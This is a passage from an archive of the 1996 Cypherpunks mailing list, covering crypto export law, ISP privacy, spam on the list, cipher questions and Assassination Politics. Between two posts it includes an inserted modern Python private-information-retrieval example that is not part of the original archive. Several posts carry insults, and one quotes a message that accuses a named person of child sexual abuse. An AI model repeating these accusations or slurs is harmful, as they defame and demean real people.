And sent a thousand business cards to Mr. and Mrs. Shergold now,
I have a very poor grip of political geography,
And absolutely no involvement (yet!) in child pornography,

ALL: And absolutely no, etc.

I've paid two-fifty dollars for the Nieman-Marcus recipe,
And told the Spanish tourist's tale about the toothbrush pessary,
In short, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL: In short, in matters meaningless and ultimately trivial,
He is the very model of a Usenet individual.

In fact, when I know what is meant by "binary" and "FTP",
When I know how to decode porno JPEGs from a .uue,
When I can handle HTML, Telnet, mail and IRC,
And when I know the words initialized to form "http",
When I have learnt what topics are acceptable in talk.bizarre,
When I know more of Usenet than the tailpipe of a motor-car,
In short, when I've a smattering of elementary netiquette,
You'll say a better individual has never surfed the Net.

ALL: You'll say a better individual, etc.

For my technical experience, although I claim to know it all
Could barely serve to run the installation disk from AOL;
But still, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL: But still, in matters meaningless and ultimately trivial,
He is the very model of a Usenet individual.
-----------------------------------------------------------------
Harry Erwin, Internet: herwin at gmu.edu, Web Page: http://osf1.gmu.edu/~herwin
49 year old PhD student in computational neuroscience ("how bats do it" 8)
and lecturer for CS 211 (data structures and advanced C++)

-- Eugene Volokh, UCLA Law

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
 -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From gbroiles at netbox.com Tue Sep 24 22:53:18 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Wed, 25 Sep 1996 13:53:18 +0800
Subject: Bernstein hearing: The Press Release
Message-ID: <3.0b19.32.19960924160043.006edf48@ricochet.net>

>And the ITARs are only executive orders, no? Not laws, right? I'm curious
>as to why they're considered valid. Anyone know?

They're administrative regulations. Legislative bodies (like Congress and state legislatures) can delegate some of their legislative authority to executive agencies (like the Forest Service or the State Dept) to make rules which have the force of law. This is done because legislatures don't have time to write all of the laws that bureaucrats think ought to be written - so the legislature says "Fine, write your own damn laws."

Legislatures don't want to bother with deciding where you can build a fire on federal lands or exactly how close you can fly to an airport if you're not taking off or landing or what happens to undeliverable mail at the Post Office. So legislatures give some of their lawmaking power to the agencies that are in a position to see what needs to be regulated. The delegation of power is limited by superior law (e.g., statutes written by the legislature) and the regulatory duties of the agency (such that the Forest Service can't write regs for the FAA, etc.) and by the grant of power itself.
This sounds like cops making up their own laws - and it is, but they have to act like legislatures when they do it. This means that they must (generally) publish proposed regs, accept comments, ignore them, and then publish final regulations. Agencies can't change the regs on a daily or a case-by-case basis, or change them without making the changes public. (But "public" means "buried somewhere in the Federal Register".)

And that's what the ITAR is - a body of administrative law developed by the executive branch pursuant to a grant of power from Congress. (e.g., 22 USC 2778(a)(1), ". . . The President is authorized to designate those items which shall be considered as defense articles and defense services for the purposes of this section and to promulgate regulations for the import and export of such articles and services. The items so designated shall constitute the United States Munitions List.") It is subject to review by the courts just like the product of Congress itself; and an agency can't do something Congress can't do, like write an unconstitutional law.

(Which is not to say that I agree with the inclusion of crypto on the list, or even the idea of "export controls", but I've seen the argument that "ITAR is not a real law so none of this matters" float across the list a few times and it's not realistic. Whether or not a given individual likes the idea of administrative rulemaking, it's clear that the courts and the government think that it's real, and will put people in jail for violating administrative regs.)

--
Greg Broiles | "We pretend to be their friends,
gbroiles at netbox.com | but they fuck with our heads."
http://www.io.com/~gbroiles | |

From rwright at adnetsol.com Tue Sep 24 22:55:01 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Wed, 25 Sep 1996 13:55:01 +0800
Subject: Public Schools
Message-ID: <199609250325.UAA10747@adnetsol.adnetsol.com>

On Or About: 24 Sep 96 at 14:16, Dr.Dimitri Vulis KOTM wrote:

> No, on the contrary, sending poor kids to good schools on scholarships
> does not improve their genes. They tend to become drug dealers.
>

That just about does it for me. This jerk is just trying to push everyone's buttons. He is doing a beautiful job. Fuckhead.

Ross

From harmon at tenet.edu Tue Sep 24 23:00:00 1996
From: harmon at tenet.edu (Dan Harmon)
Date: Wed, 25 Sep 1996 14:00:00 +0800
Subject: Public Schools
In-Reply-To: <199609241652.LAA22261@mailhub.amaranth.com>
Message-ID:

On Tue, 24 Sep 1996, William H. Geiger III wrote:

> Dan Harmon said:
> >One of the hardest things that we have to work hardest to counter-act
> >with our twins, who attend PS, is the socialization they
> >pick up at school.
>
> There is an easy solution to that problem, it's called home school. :)
>

We know several people that home school and it takes a very special people to do it. In our case, it may turn out to be the only option. The twins are ADHD with possible Tourettes and/or OCD. They were diagnosed at four, before it became the rage, and are now ten, going on six emotionally. We keep trying and working with them.

Dan

From unicorn at schloss.li Tue Sep 24 23:02:22 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Wed, 25 Sep 1996 14:02:22 +0800
Subject: Lexis and Privacy - Bill approaches.
Message-ID:

Pressure from the FTC (which fielded hundreds of complaints about Lexis and the social security number scrap) has prompted members of the Banking Committee to add provisions to the most recent spending bills which protect personal information (including social security numbers, phone numbers, addresses, and so forth) under the Fair Credit Reporting Act.
This limits access to this information to credit agencies and otherwise authorized entities. (Of which I assume Lexis is not one).

It's not great protection, but it's something.

I urge everyone to take their own measures to protect personal data regardless of what some piece of paper on a library shelf says is protected. The only real protection is not to allow release of the data in the first place.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From shamrock at netcom.com Tue Sep 24 23:03:20 1996
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 25 Sep 1996 14:03:20 +0800
Subject: Private Information Retrieval
In-Reply-To: <2.2.32.19960924222443.006964e8@netcom7.netcom.com>
Message-ID:

On Tue, 24 Sep 1996, Ravi Pandya wrote:

> ABSTRACT:
>
> Publicly accessible databases are an indispensable resource for retrieving
> up to date information. But they also pose a significant risk to the
> privacy of the user, since a curious database operator can follow the user's
> queries and infer what the user is after.

Hmm. Sounds like job for KeyKOS :-)

--Lucky

From m5 at tivoli.com Tue Sep 24 23:03:25 1996
From: m5 at tivoli.com (Mike McNally)
Date: Wed, 25 Sep 1996 14:03:25 +0800
Subject: [EFG] Fwd: Ga. Internet Law Challenged
In-Reply-To: <2.2.32.19960925010103.00679840@smtp1.abraxis.com>
Message-ID: <3248AAFE.5F7@tivoli.com>

> >> ``If 50 states pass 50 contradictory laws, Internet users will
> >>be virtually paralyzed for fear of violating one or more of those
> >>laws,'' she said.

Actually, I imagine Internet users will simply snigger and go on with their idiotic "me too"s to USENET, their sophomoric nudie websites, and their spams.

(I love the Internet.)

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that
mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data
http://www.io.com/~m101/ * processing" are different!
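On the Private Information Retrieval thread above (the colloquium abstract that Lucky Green's reply quotes), here is an added example, not taken from the talk or from any list member: a standard two-server XOR construction over a square bit matrix, which cuts communication from $n$ bits to about $4\sqrt{n}$. The abstract does not spell out the talk's schemes, so this should not be read as them; it assumes the two replicas do not compare queries, and the database contents are constructed.

```python
import secrets
from math import isqrt


def as_square(bits):
    """Pad the n-bit database with zeros to an m x m matrix (row-major)."""
    m = isqrt(len(bits))
    if m * m < len(bits):
        m += 1
    padded = list(bits) + [0] * (m * m - len(bits))
    return [padded[r * m:(r + 1) * m] for r in range(m)], m


class Replica:
    """One copy of the database, run by a possibly curious operator."""

    def __init__(self, bits):
        self.rows, self.m = as_square(bits)
        self.log = []  # every query this operator gets to see

    def answer(self, column_mask):
        """For each row, XOR together the bits in the selected columns."""
        self.log.append(tuple(column_mask))
        reply = []
        for row in self.rows:
            acc = 0
            for bit, selected in zip(row, column_mask):
                acc ^= bit & selected
            reply.append(acc)
        return reply


def make_queries(m, col):
    """Two masks that differ only at `col`; each alone is uniformly random."""
    q1 = [secrets.randbelow(2) for _ in range(m)]
    q2 = list(q1)
    q2[col] ^= 1
    return q1, q2


def retrieve(replica_a, replica_b, index):
    """Fetch database bit `index` without either replica learning `index`."""
    m = replica_a.m
    row, col = divmod(index, m)
    q1, q2 = make_queries(m, col)
    a1 = replica_a.answer(q1)
    a2 = replica_b.answer(q2)
    # Columns present in both masks cancel; only column `col` survives.
    return a1[row] ^ a2[row]


def communication_bits(n):
    """Bits exchanged per retrieval: two m-bit queries plus two m-bit replies."""
    m = isqrt(n)
    if m * m < n:
        m += 1
    return 4 * m


if __name__ == "__main__":
    database = [secrets.randbelow(2) for _ in range(1000)]  # constructed data
    a, b = Replica(database), Replica(database)
    assert all(retrieve(a, b, i) == database[i] for i in range(len(database)))
    print("bits per query:", communication_bits(len(database)),
          "instead of", len(database))
```

Each replica's log holds only uniformly random masks, so neither operator alone can tell which index was requested; if the two compare logs, the single differing position reveals the column.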
From jamesd at echeque.com Tue Sep 24 23:11:09 1996
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 25 Sep 1996 14:11:09 +0800
Subject: We removed radikal 154 from xs4all :(
Message-ID: <199609242023.NAA10025@dns1.noc.best.net>

At 6:31 PM 9/23/96, tank wrote:
>>Hi all,
>>
>>We have temporary removed radikal 154 from xs4all.
>>
>>We did this because the german ICTF and BAW continued to stop IP-traffic
>>to and from xs4all. They not only blocked the web-server (with more than

At 02:00 PM 9/23/96 -0700, Timothy C. May wrote:
>Unfortunately, this means that Germany wins.

No it does not: It means that I and presumably lots of other people just added radikal to their web sites.

---------------------------------------------------------------------
                                       |
We have the right to defend ourselves  | http://www.jim.com/jamesd/
and our property, because of the kind  |
of animals that we are. True law       | James A. Donald
derives from this right, not from the  |
arbitrary power of the state.          | jamesd at echeque.com

From whgiii at amaranth.com Tue Sep 24 23:33:37 1996
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 25 Sep 1996 14:33:37 +0800
Subject: ISP Legal Fund
Message-ID: <199609250430.XAA29666@mailhub.amaranth.com>

Hi,

As it seems to be an almost daily event of hearing of a government authority infringing on the liberty of Internet Users throughout the world I would like to present the following proposal:

The establishment of an Internet Service Provider Legal Fund.

All ISP world-wide would contribute to this fund. The resources of this fund would be used for the legal fees of ISP who wish to challenge government infringements of their users freedoms & liberties.

Something like an ACLU for the Internet but on a Global scale.

Any thoughts?

--
-----------------------------------------------------------
William H. Geiger III http://www.amaranth.com/~whgiii
Geiger Consulting WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site
Author of PGPMR2 - PGP Front End for MR/2 Ice
Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
Finger whgiii at amaranth.com for PGP Key and other info
-----------------------------------------------------------

From adam at homeport.org Tue Sep 24 23:40:17 1996
From: adam at homeport.org (Adam Shostack)
Date: Wed, 25 Sep 1996 14:40:17 +0800
Subject: Banning annoying users
In-Reply-To: <199609241158.HAA27269@envirolink.org>
Message-ID: <199609242021.PAA07861@homeport.org>

Daniel Miskell wrote:
| The
| not allowing unsubscribed individuals to post is logical, for a time. But
| that basically outlaws anon remailers that don't allow you to send to an
| account, and a lot of them don't, from my limited understanding. Besides, if
| we set up the list to ban people who are 'undesirable', instead of just using
| our own killfiles to do the dirty work for the list, then what is to stop

If non-subscribers, aka remailers are banned from cypherpunks, I'll personally subscribe every remailer to the list. Be a good exercise in writing filters for the remailers.

Saying that you can't deal with immature people using remailers, and thus they should be banned from cypherpunks is ammo to our opponents, who will seize the opportunity to say, 'See, even cypherpunks can't deal with anonymity.'

The list has gone way downhill, but offers a forum unavailable elsewhere online. As Tim points out, you can contribute or leave. I'm trying to contribute.

As a basic rule of thumb, if your posts are generating lots of flames, you're not contributing, you're arguing. (He says to generate flames.)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From bdavis at thepoint.net Tue Sep 24 23:51:57 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Wed, 25 Sep 1996 14:51:57 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com>
Message-ID:

On Tue, 24 Sep 1996, Rich Burroughs wrote:

>
> Anyone who mistakes the lack of "repudiations" for AP on the list for some
> kind of tacit approval is not getting the whole picture, IMHO.
>
> Is this how journalists do their research nowadays -- "give me some info or
> I'll write something really bad about you that you'll regret?" Cool. I
> guess I thought there might still be some kind of pursuit of the truth
> involved.
>
> I personally don't have the time or energy to contribute to the AP threads.
> That != approval for the idea.
>
> I hope you include your above quote in your piece.
>

Amen to that. Add that at least one lawyer (and former prosecutor) on the list is confident that successful prosecutions will ensue if AP ever gets off the ground.

And yes, I've read Jim Bell's manifesto. The fact that no lawyer has dissected it from a legal standpoint has been used by Mr. Bell as support for the proposition that it is legal. As many professional cryptographers/computer security experts/etc. on the list rightly say when free work is demanded of them: pay me my rate and I'll do the analysis.

EBD

>
> Rich
>
>
> ______________________________________________________________________
> Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb
> See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
> U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
> New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause
>

From tcmay at got.net Wed Sep 25 00:39:15 1996
From: tcmay at got.net (Timothy C.
May)
Date: Wed, 25 Sep 1996 15:39:15 +0800
Subject: Namibia, Marxists, and Peaceful Transitions
Message-ID:

At 5:02 PM 9/24/96, stewarts at ix.netcom.com wrote:

>People have been imposing their will on others in Ireland for 800 years,
>and killing off the more prominent members of the opposition has been
>a long-term policy of the thugs who've been doing it. Today there are
>at least three competing gangs of thugs trying to impose their will on
>others by force. The Protestants are afraid that the Catholic majority
>on the island will enforce their rule on them, and the Catholics in the north
>are afraid that the Protestants will enforce their rule on them,
>both with good reason as near as I can tell. At least a few years ago,
>the IRA were spouting Marxist rhetoric and wanted to impose their
>Marxist thuggery on the whole island. The Queen's Empire's army
...

Apropos of this (but not apropos of mathematical cryptography :-}), I read an amazing article, an uplifting article, a few years ago in the WSJ.

The article was about Namibia, the country to the northwest of South Africa. Also known at times as "South-West Africa." (Being a Pynchon fan, Namibia and its Hereros had always had some interest to me.)

South Africa was involved in a war/occupation situation with Namibia for many decades, with hit teams deployed to Windhoek to kill off opponents, etc. A bad situation all around. Some similarities with the situation in Northern Ireland.

The leader of the opposition--which I think was called SWAPO, though that might have been Angola...anyway, some alphabet soup name like SWAPO--was a U.S.-trained college professor-type dyed-in-the-wool Marxist theoretician. He lived for years in Harlem and wrote articles about the coming Marxist paradise in Namibia. Rhetoric about driving out the parasites that prey upon the body of the people, seizing the means of production, yadda yadda yadda. All the usual Marxist stuff.

Well, South Africa pulled out.
Some sort of "peaceful transition" was arrived at, and the Marxists moved in. Except they almost immediately abandoned their Marxist rhetoric (which was approximately coincident with the collapse of Communism and the Berlin Wall, U.S.S.R., etc., so this may have had something to do with their loss of Marxist faith).

The long and short of it is that the Namibian economy is doing well, relations with South Africa are good (also helped by changes in RSA's government one has to assume), the citizens are happy, AP-type killings have stopped, and both blacks and whites appear to be getting along fine. After reading the article, and seeing an interesting Namibian-made movie called "Dust Devil," I decided I would one day visit Namibia as a tourist.

(The article was a stunning one, the kind that the WSJ is able to sometimes do so well. I clipped it out, but have long since lost track of it. If anybody finds it in any online archives, I would appreciate getting a copy.)

Whether Northern Ireland could be handled so felicitously is not clear, though I suspect the North could be absorbed into the Republic of Ireland easily and without "summary executions" of Protestants. Ireland--the Republic--is doing pretty well, has lots of high-tech plants (including a massive Intel chip factory near Limerick) and I think even the Northern Ireland Protestants would end up better off under Irish rule.

(While many of us dislike the basic notion of "Irish rule," surely the nonlocal rule by a country across the Irish Sea is less appropriate than by the historical and geographic "landmass" of Ireland per se?)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frantz at netcom.com Wed Sep 25 00:49:19 1996 From: frantz at netcom.com (Bill Frantz) Date: Wed, 25 Sep 1996 15:49:19 +0800 Subject: Private Information Retrieval Message-ID: <199609250458.VAA20863@netcom8.netcom.com> At 8:54 PM 9/24/96 -0700, Lucky Green wrote: >On Tue, 24 Sep 1996, Ravi Pandya wrote: > >> ABSTRACT: >> >> Publicly accessible databases are an indispensable resource for retrieving >> up to date information. But they also pose a significant risk to the >> privacy of the user, since a curious database operator can follow the user's >> queries and infer what the user is after. > >Hmm. Sounds like job for KeyKOS :-) Yup. That was the original problem KeyKOS nee Gnosis was designed to solve. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From Adamsc at io-online.com Wed Sep 25 00:51:40 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 15:51:40 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <19960925052046390.AAA216@IO-ONLINE.COM> On Mon, 23 Sep 1996 01:50:01 -0400, Dustbin Freedom Remailer wrote: >Tim C[unt] May is not only as queer as a three dollar bill, but he is also into >having sex with children. Hi Dmitri! From Adamsc at io-online.com Wed Sep 25 01:01:48 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 16:01:48 +0800 Subject: Taking crypto out of the U.S. 
Message-ID: <19960925054434656.AAA117@IO-ONLINE.COM>

On Mon, 23 Sep 1996 21:25:33 -0500 (EST), Adam Shostack wrote:

>There's a personal use exemption. Michael Froomkin's web page has a
>pointer to it.

What if your laptop gets "stolen"? Or you sell it for a plane ticket home after your wallet gets pinched?

>| Soon I am going to be going overseas to Japan, and I want to take
>| my notebook with me so I can keep up with everything, however, I have
>| encrypted my hard drive and usually encrypt my mail. Is this in violation
>| of the ITAR to keep everything the same when I go over?

From geeman at best.com Wed Sep 25 01:02:26 1996
From: geeman at best.com (geeman)
Date: Wed, 25 Sep 1996 16:02:26 +0800
Subject: Tamper-Resistant Software from INTEL
In-Reply-To: <199609242330.SAA16789@oak.zilker.net>
Message-ID: <3248C68E.F61@best.com>

Scott Guthery wrote:
>
> Has anybody heard of tamper-resistant software in general or a method
> for tamper-resistant software from Intel in particular?
>

yes.

From markm at voicenet.com Wed Sep 25 01:07:05 1996
From: markm at voicenet.com (Mark M.)
Date: Wed, 25 Sep 1996 16:07:05 +0800
Subject: Banning annoying users
In-Reply-To:
Message-ID:

On Tue, 24 Sep 1996, Ray Arachelian wrote:

> This is wonderful in theory -- and in practice up until now, but what
> happens when someone decides "Oh, I hate this list and Tim, let me write
> a spam bot to anonymously spam the this into oblivion?" There is such a
> thing as denial of service via spamming. It's quite easy to do for
> someone who knows how to run sendmail and knows how to write a shell
> script or a small program. Hell, I could write one of those in less than
> 1 minute.
>
> As for me being banned, I doubt it, I'm not posting daily Tim warnings
> and such spams. yeah, banning someone off the list for their political
> or even crypto views is silly. Banning someone for spamming is another
> issue.
>
> There is no reason we can't allow posts from those who are not subscribed
> to the list.
> There's also no reason that we can't have someone moderate
> those posts before they make it to the list to remove the spams - mind
> you not to moderate the contents, but to remove repeating annoying spam
> and advertisement.

This scheme would not allow people using anonymous remailers to post to the list. If you let posts through anonymous remailers through, then the refusal to allow anyone not subscribed to post becomes meaningless. Spam can be prevented by looking for a large number of messages delivered at about the same time. There's no need to involve a moderator.

Mark
--
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From tcmay at got.net Wed Sep 25 01:10:54 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 16:10:54 +0800
Subject: ISPs' information on users
Message-ID:

At 8:18 PM 9/24/96, Robert Hettinga wrote:
>--- begin forwarded text
>> ------------------------------
>> Brave Old World:
>> Reflections on Europe in the Digital Age
>> by Steven Carlson; 20 Sep 1996
>> ------------------------------
>>
>> ** So Much Fuss About A Bottle Of Ketchup
>>
>> Hungarian police recently sent a fax around to the local Internet
>> service providers (ISPs) asking them to provide lists of their users
>> in Esztergom, a small town outside of Budapest. It seems somebody
>> had planted a bomb in a bottle of ketchup. Since everyone knows you
>> can download bomb-making instructions from the Internet, the police
>> figured they should investigate the local users. No, I'm not making
>> this up.

So, Hungary has GAK -- Government Access to Ketchup. Good to know the 57 Varieties are now considered munitions.

On a more serious note, perhaps legal experts here could comment on something I've been wondering about. Could ISPs in the U.S. be compelled to report on the browsing and net surfing habits of their customer base?
To make this clear, I don't mean in a specific criminal case, where the records are searchable under a warrant. I mean a blanket order that all ISPs compile and forward records.

Were I an ISP, I would probably say, "Hell no! They're my records and the Fourth Amendment says my records are to be secure unless a proper court order is issued. Besides, my fee for generating each kilobyte of records is $100,000, nonnegotiable."

(I think I've answered my own question, namely, ISPs would be under no obligation to report on customer activities, absent a proper warrant, and consistent with the ECPA.)

However, ISPs are _not_ accorded the same status as priests, lawyers, and others with such privacy privileges (and obligations). Would it be legal for an ISP to offer for sale such records? Or to voluntarily go to the cops?

(There's a certain new ISP with tight links to a quasi-religious group much in the news lately, and some have speculated that this ISP may be monitoring certain users....)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From stewarts at ix.netcom.com Wed Sep 25 01:14:31 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 25 Sep 1996 16:14:31 +0800
Subject: provably hard PK cryptosystems
Message-ID: <199609250509.WAA20265@dfw-ix12.ix.netcom.com>

At 03:26 PM 9/24/96 +0200, Gary Howland wrote:
>I fail to see *any* (non educational) use for these DNA "computers", let
>alone a cryptographic use - sure, they may be massively parallel, but
>what's the big deal?
>I can now perform a calculation a million times
>faster than I could yesterday? (something I personally doubt, but will
>agree to for sake of the argument).

One mole of a substance contains ~6x10**23 molecules, and weighs one gram per atomic-weight of the molecule. A DNA "computer" might weigh a kilo or two for one mole of computer virus. It may not be blazingly fast, especially if you've got to synthesize lots of different molecules to make it up, plus extract the result from the data soup, but 10**23 is a _big_ number.

It's probably not very useful for cryptographic applications, but Adleman was using it to solve Travelling Salesman problems, which are NP-hard, and if you do have a crypto problem that maps well into TSP, a hot-tub full of interesting solutions might be an interesting solution, especially if you've got a huge underground lab and a National Institutes of Health nearby in case you have any bugs or memory leaks in your program.....

Unlike quantum computing, it doesn't change the exponentiality of the problems it's solving, it just multiplies the computing capability by a very big constant, and it does parallelize cleanly. The engineering is tricky, but I find it more believable than practical high-precision quantum computers. And if the DNA computer doesn't work, you can always recycle your lab to synthesize large quantities of recreational pharmaceuticals and use the money from them to bribe the person who knows the key.

Avogadro

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From Adamsc at io-online.com Wed Sep 25 01:16:43 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 16:16:43 +0800
Subject: List participation
Message-ID: <19960925053157109.AAA213@IO-ONLINE.COM>

On Mon, 23 Sep 1996 10:25:09 -0700, Eric Hughes wrote:

>I have been informed that Dr.Dimitri Vulis KOTM wrote:
>> [...]
Tim's off-topic spews have driven Eric Hughes, John Gilmore, >> Rich Salz, and many other former valuable contributors off the >> mailing list [...] > >As for me, I stopped having time to read cypherpunks a year and a half ago. >Tim had nothing to do with it. The cypherpunks list has changed and I have >changed; so be it. What do you think the odds are the good Dr. is going to say this is a forgery by tcmay? From dthorn at gte.net Wed Sep 25 01:21:02 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 16:21:02 +0800 Subject: More proposals for European censorship In-Reply-To: <199609231442.HAA20480@toad.com> Message-ID: <32488744.51AA@gte.net> Peter Trei wrote: > Asgaard writes: > > On Thu, 19 Sep 1996, E. Allen Smith forwarded: > > >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European > > >> Parliament pressed the European Union on Thursday to act to curb > > >> child sex and trafficking rings, saying the fight against sexual > > >> abuse of children must be an "absolute priority." > > It's probably no coincidence that the recently busted, utter > > horrible > > child-molesting ring, with obvious protection from various persons > > in the establishment, was centered in Belgium - that's where the EU > > bureaucrat nomenklatura play their power games and go to bordellos. > What exactly are you suggesting when you say 'it's probably no > coincidence?" I can't quite figure it out. "I can't quite figure it out" - says a lot right there. > [While I've not been following the case in detail, it involves a ring > of criminals in Belgium who kidnapped children to use them in > child pornography. At least two little girls were starved to death > when they're usefullness was over.] > Are you suggesting that someone specifically set up a ring of > child pornographers/murders in Belgium, then let it get caught, in > an attempt to influence the EU parliment? 
> Or are you suggesting that this particular gang of sub-humans was > exposed at this time in an attempt to influence policy, implying that > the Belgian LEAs knew about, but did not stop the ring until they > needed a publicity coup? > I find such notions utterly beyond rationality. Per that comment about rationality: That LEA's knew about the ring, or that they would participate in a scam of some kind? > Do you expect we're going to see a statement from some Belgian > police investigator to the effect of "Yes, I knew they were raping > and killing children, but was told to do nothing, and I obeyed."? Any statement that is consistent with developments in this case, and other similar cases, most likely. > There is a tendency of many on this list to demonize those we > disagree with. If a person or group takes the 'wrong' stance on > cryptography, key "escrow", etc, many list members will act as > if that person or group were capable of any atrocity, and is acting > out of the very worst of motives and hidden agendas. > Such an attitude is common, but not desirable in the modern world. > It served some purpose when war involved the literal massacre of > one's opponents - it's easier to commit genocide against the tribe > over the ridge if you demonize them into not-quite-humans, but in > the modern world this is not a rational option. You should know that "many on this list" bears no relation to the LEA's mentioned above. People on this list have relatively small agendas, in money terms, whereas the LEA's are servicing people with Big Money. > While it's possible to regard many policies of governments, > ill-informed, self-serving, populist, and wrong, to act as if there is > no significant differences between real democracies and the worst > authoritarian dictatorships is absurd. Please list any "real democracies". Thanks a bunch. 
From stewarts at ix.netcom.com Wed Sep 25 01:21:58 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 25 Sep 1996 16:21:58 +0800
Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto!
Message-ID: <199609250610.XAA23137@dfw-ix12.ix.netcom.com>

At 11:34 AM 9/24/96 -0500, "William H. Geiger III" wrote:
>I just recently downloaded copies of Blowfish & Ghost.

Do you mean GOST, the Russian algorithm family?

>Does anyone have any experience with these two algorithms?
>How do they compare to RSA, DES, 3DES, IDEA ?

Bruce Schneier's book Applied Cryptography discusses Blowfish (no surprise, since it's his algorithm) and I think also discusses GOST.

Blowfish is very fast once you've finished the (deliberately slow) key schedule. It appears to be tolerably strong, though there hasn't been as much analysis on it as on RC4 or IDEA yet, much less DES.

GOST requires you to set some parameters, I think S-boxes, and the strength of the algorithm depends on lots of subtle effects of those parameters. The set used by the Russian military is classified; some of the other sets are public, and presumably the implementation you have gets its values from someone. Unless you know who, and how strong they are, I wouldn't trust it.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From stewarts at ix.netcom.com Wed Sep 25 01:27:35 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 25 Sep 1996 16:27:35 +0800
Subject: Bork book
Message-ID: <199609250609.XAA23128@dfw-ix12.ix.netcom.com>

At 11:28 AM 9/24/96 -0400, "Marc J. Wohler" wrote:
>Heard him on Limbaugh pushing hard for censorship as a cure for society's
>problems.

Looks like Ted Kennedy & Co. were right to keep him off the court.
Bork's comment a few years ago about the Ninth Amendment being an ink-blot on the Constitution was one of those Rorschach things you can interpret either way, but given that he clearly doesn't believe in the First Amendment, I'd guess he wouldn't have helped the 9th or the other rights-protecting amendments either. I didn't catch Bork directly, but I heard Limbaugh talking about it the day before and about half an hour after, so I caught some flavor of it. It was interesting hearing Limbaugh's mixed feelings about it; he seems to clearly _approve_ of censoring people that offend him, like 2 Live Crew, but also realizes that people would want to censor _him_. I'm guessing that the schtick he did on Pee-Wee Herman (with background music by Michael Jackson) a few minutes before saying he'd be interviewing Bork on Friday was coincidence, rather than something he'd done to set the tone of a discussion of censorship, but maybe not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Wed Sep 25 01:31:43 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 25 Sep 1996 16:31:43 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] Message-ID: <199609242325.QAA10957@mail.pacifier.com> At 03:19 PM 9/24/96 -0400, Simon Spero wrote: >On Tue, 24 Sep 1996, attila wrote: > >> >> go back to your beloved England and your labour unions > your roots are showing :-) ----^ > >> NO, I will not outright reject Jim Bell's "Assassination >> Politics." > >Assasination politics is impossible to defend from a classical >Liberal/Libertarian position. Bell advocates arbitrary applications of >violence and coercion without restriction. There is no way to justify the >initiation of force without abandoning any pretence of being a >Libertarian (which, to be fair, Bell doesn't claim to be). 
